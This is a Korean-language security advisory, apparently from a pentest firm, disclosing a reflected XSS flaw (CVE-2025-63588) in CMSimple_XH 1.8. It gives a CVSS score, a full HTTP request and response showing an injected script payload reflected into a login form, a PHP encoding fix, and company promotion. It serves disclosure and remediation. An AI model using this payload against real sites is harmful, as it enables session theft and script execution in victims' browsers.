
CVE-2025-63588에 대한 상세 개념 증명(PoC), CMSimple_XH 1.8의 반사형 XSS 취약점, CVSS 점수, 영향 분석, 및 안전한 코딩 수정 예제 포함.
추정 CVSS v3.1: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N → 6.1 (Medium)
할당된 CVE: CVE-2025-63588
제품: CMSimple_XH - 1.8
공급업체: CMSimple_XH - https://www.cmsimple-xh.org/
CMSimple_XH 프론트 라우터 파싱 코드에서 동적 로그인 관련 입력을 처리하는 부분에 반사형 크로스 사이트 스크립팅(XSS) 취약점이 존재합니다. 애플리케이션은 요청 URI에서 가져온 공격자 제어 데이터를 적절한 출력 인코딩 없이 생성된 HTML(예: form action 속성 및 anchor href)에 직접 반영합니다. 공격자는 피해자가 방문할 경우 취약한 사이트의 컨텍스트에서 임의의 JavaScript가 실행되도록 하는 URL을 조작할 수 있습니다.
이는 반사형 XSS(비지속형)입니다. 악용하려면 피해자가 조작된 링크를 따라야 합니다. 공급업체에 통보되었으며, 이슈는 문서화되어 위의 CVE가 할당되었습니다.
HttpOnly로 설정되지 않은 경우 세션 토큰이 도난될 수 있습니다.취약점은 동적 경로 세그먼트를 파싱하여 페이지/템플릿 변수에 매핑하는 프론트 라우터 / index.php(또는 이에 상응하는 프론트 컨트롤러) 코드에서 비롯됩니다. 원시 경로 조각(CMSimple_XH 라우터에서 사용하는 ?Templates... 스타일 조각)이 페이지 템플릿에 전달되고 적절한 HTML 속성 인코딩 또는 살균 없이 HTML 속성에 주입되어, 주입된 <script> 태그나 기타 페이로드가 그대로 렌더링될 수 있습니다. 유사한 반사형 XSS 문제가 다른 웹 구성 요소에 대해 게시된 바 있으며, 일반적으로 신뢰할 수 없는 입력의 부적절한 출력 인코딩으로 인해 발생합니다.
이 PoC는 공격자가 제공한 입력이 반환된 HTML에 반영되어 피해자의 브라우저에서 실행되는 것을 보여줍니다.
요청:
POST /cmsimplexh/?Templatesx6l81"><script>alert(1)</script>y92q9 HTTP/1.1
Host: 192.168.98.129:8080
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0
Origin: http://192.168.98.129:8080
Upgrade-Insecure-Requests: 1
Referer: http://192.168.98.129:8080/cmsimplexh/?Templates&login
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: "Chromium";v="138", "Not;A=Brand";v="24", "Google Chrome";v="138"
Sec-CH-UA-Platform: "Windows"
Sec-CH-UA-Mobile: ?0
Content-Length: 45
login=true&keycut=z9U%21q2k%21F0&submit=Login
응답:
HTTP/1.1 200 OK
Host: 192.168.98.129:8080
Date: Mon, 06 Oct 2025 02:50:49 GMT
Connection: close
X-Powered-By: PHP/8.3.6
Set-Cookie: XH_2f636d73696d706c6578682f=v7hkld81biddtmoua1maptd18a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html;charset=UTF-8">
<title>English Site Title – Login</title>
<meta name="robots" content="noindex">
<meta name="keywords" content="Enter list of comma separated keywords here">
<meta name="description" content="Enter website description for search engine results here">
<link rel="stylesheet" href="./assets/css/xhstyles.css" type="text/css">
<link rel="stylesheet" href="./templates/fhs-simple-2019/stylesheet.css" type="text/css">
<meta name="robots" content="noindex">
</head>
<body class="xh_login" onload="document.forms['login'].elements['keycut'].focus();">
<div class="xh_login"><h1>Login</h1><p class="xh_fail">You have entered a wrong password!</p><p><b>Site administration. Please enter password.</b></p><form id="login" name="login" action="/cmsimplexh/?Templatesx6l81"><script>alert(1)</script>y92q9" method="post"><input type="hidden" name="login" value="true"><input type="password" name="keycut" id="passwd" value=""> <input type="submit" name="submit" id="submit" value="Login"></form><p><a href="/cmsimplexh/?Templatesx6l81"><script>alert(1)</script>y92q9">Back</a></p> </div></body>
</html>
피해자의 브라우저가 이 페이지를 렌더링하면 주입된 <script>alert(1)</script>가 실행됩니다.

$action_url = '/cmsimplexh/?' . rawurlencode($template_token);
echo '<form action="' . htmlspecialchars($action_url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '" method="post">';
https://github.com/cmsimple-xh/cmsimple-xh/releases https://nvd.nist.gov/vuln/detail/CVE-2025-24576
질문이나 상담이 있으시면 부담없이 연락주십시오.
📞 Tel: 03-6853-5823
📧 Mail:[email protected]
| 항목 | 내용 |
|---|---|
| 회사명 | 株式会社CyberCrew |
| 주소 | 東京都千代田区外神田1-18-13 秋葉原ダイビル6階 |
조직의 취약점을 다각도로 분석하고 최적의 개선 방안을 제안합니다.
표적형, 시나리오형, LLM 펜테스트까지 대응 가능합니다.
기밀 정보 유출을 조기에 감지하고 신속히 대응합니다.
실전적인 공격 시나리오에 기반한 방어력 평가를 실시합니다.
개발 초기 단계부터 보안을 고려한 설계를 지원합니다.
🌐 공식 사이트:https://www.cybercrew.co.jp
🕒 CyberCrew — 당신의 신뢰할 수 있는 보안 파트너.